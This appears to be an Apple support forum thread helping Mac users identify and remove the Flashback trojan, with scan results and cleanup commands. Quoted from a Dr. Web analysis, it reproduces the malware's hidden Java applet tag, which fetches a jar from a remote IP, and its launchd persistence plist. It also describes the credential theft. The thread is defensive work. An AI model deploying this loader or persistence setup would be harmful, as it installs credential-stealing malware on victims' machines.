.rserv wants to connect to cuojshtbohnt.com

Is .libgmalloc.dylib a legitimate file that is in some way corrupted by the malware, or is .libgmalloc.dylib itself bad?

If it is a legitimate file that is corrupted by the malware, how does one restore a proper version of it?

Thanks.

Bob Mayo wrote:

Is .libgmalloc.dylib a legitimate file

No.

Basically, any shared code library whose name begins with a dot (.), which renders it invisible in Finder, is unlikely to be legitimate. Note that there are many shared code libraries on your Mac, and there are quite a few files whose names begin with dots (usually containing configuration or registration data). It's the combination of code and dot as first character that makes it highly suspicious and probably not legitimate.

(post deleted -- somehow didn't notice fane_j gave the answer I was going to give)

Has anyone determined what mkeeper (MacKeeper) and com.zeobit (MacKeeper developer) are doing here? From Dr. Web on the BackDoor.Flashback.39 (This was brought up quickly earlier in this thread, but AFAIK never fully explored.)

http://vms.drweb.com/virus/?i=1816029

<object type="application/x-java-applet" width="0" height="0"> <param name="s" value="1"/> <param name="q" value="2"/> <param name="svname" value="com.zeobit.keep"> <param name="svbname" value="mkeeper"> <param name="dname" value="Software Update"> <param name="lurl" value="31.31.79.87">'); <param name="archive" value="al-2.jar"> <param name="code" value="a.apl"> </object>

Эксплойт сохраняет на жесткий диск исполняемый файл и plist-файл отвечайющий за его запуск.

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key><string>com.zeobit.keep</string> <key>ProgramArguments</key><array><string>/Users/<username>/.mkeeper</string></array> <key>RunAtLoad</key><true/> <key>StartInterval</key><integer>4212</integer> <key>StandardErrorPath</key><string>/dev/null</string> <key>StandardOutPath</key><string>/dev/null</string> </dict> </plist>

После запуска троян осуществляет проверку на наличие компонент и при наличии хотябы одной из них прекращает свое выполнение:

Deleted-incorrect data

It is not a legitimate file, and should be deleted. By default there is no file of that name or type in the Shared user directory.

WZZZ wrote:

Has anyone determined what mkeeper (MacKeeper) and com.zeobit are doing here

" value="com.zeobit.keep">

I can't say for certain, but I fairly sure they've nothing to do with, just like Adobe didn't have anything to do with it. These are just ID strings (which could be any valid string) used by the malware's author to confuse and obfuscate. I suspect that the identifier actually used by MacKeeper is not "com.zeobit.keep" but something else. With the Adobe string the difference was just one character, "com.adobe.reader" instead of "com.adobe.Reader".

Methinks this is the one instance where MacKeeper is not to blame.

Malware has been known to hijack other application names, as we've seen with Flash in the past. MacKeeper hasn't been known to be malware, though the company behind it has pushed some questionable marketing practices and the product is not the best (it appears crudely coded in order to rake in revenue while providing minimal benefit). Many people recommend folks uninstall or avoid MacKeeper, and the presence of references to it in the latest threats do raise question, but so far it's not too conclusive.

WZZZ wrote:

Has anyone determined what mkeeper (MacKeeper) and com.zeobit are doing here

The second one looks identical to the one that started this thread only executing ~/.mkeeper instead of ~/.rserv.

The first one I never saw before. But there is a reference to a some java code called al-2.jar.

Marco g wrote:

If anybody is interested, i renamed it to "flserv" uploaded

Thanks for doing that. It's the first sample I've been able to collect with this variant.

Readers will be happy to know the results of the following scans:

ClamXav identified it as OSX.Flashback-8.

Sophos Home Edition 8 identified it as OSX/Flshplyr-D.

MacScan did not detect anything.

12 of 42 A-V scanners detected it on virustotal.com and the link will take you to the results. Strangely enough it had not been previously uploaded. Positive identification was achieved by avast!, BitDefender, clamav, DrWeb, F-Secure, Kaspersky and Sophos, among others. Users are cautioned that "the service was not designed as a tool to perform antivirus comparative analyses, but as a tool that checks suspicious samples with several antivirus solutions and helps antivirus labs by forwarding them the malware they fail to detect."

Has anybody been able to detect, what this trojan exactly does? Either variant 1 for browsers or variant 2 systen/user installation? Some kind of keylogger or does it spy pw's that have been saved in ff/safari?

Matt Durben wrote:

Has anybody been able to detect, what this trojan exactly does? Either variant 1 for browsers or variant 2 systen/user installation? Some kind of keylogger or does it spy pw's that have been saved in ff/safari?

I'm certain both the Type 1 and Type 2 infections have the same goal, to use your network apps (browsers and Skype have been identified) to accomplish their goals. It has been observed to do re-directs to advertising sites, which I suppose could result in a small amount of compensation from the advertisers, but Intego believe there is a more lucrative goal which I just looked up earlier this evening in a February post Flashback Mac Trojan Horse Infections Increasing with New Variant where they say:

This malware patches web browsers and network applications essentially to search for user names and passwords. It looks for a number of domains – websites such as Google, Yahoo!, CNN; bank websites; PayPal; and many others. Presumably, the people behind this malware are looking for both user names and passwords that they can immediately exploit – such as for a bank website – as well as others that may be reused on different sites. (Hint: don’t use the same password for all websites!)

In a subsequent article they figured out that the results of this harvest are using Twitter to communicate back to the "Mother Ship" periodically using a specific hash tag for each date and deleting the messages after they get what they need. The message contains the unique identifier for that user and machine along with the username/password/website information.

I have created a user tip and malware checker/removal tool: https://discussions.apple.com/docs/DOC-3271

For Office 2004 users that are infected we are seeing this in their crash logs:

dyld: could not load inserted library: /User/Shared/.libgmalloc.dylib

dianeoforegon wrote:

For Office 2004 users that are infected we are seeing this in their crash logs:

dyld: could not load inserted library: /User/Shared/.libgmalloc.dylib

After removing the file the system will still try to load the file whenever Office or other programs are launched, so you will have to reset the system so it does not try to load the file. To do this, run the following commands in the Terminal:

defaults delete ~/.MacOSX/environment DYLD_INSERT_LIBRARIES

launchctl unsetenv DYLD_INSERT_LIBRARIES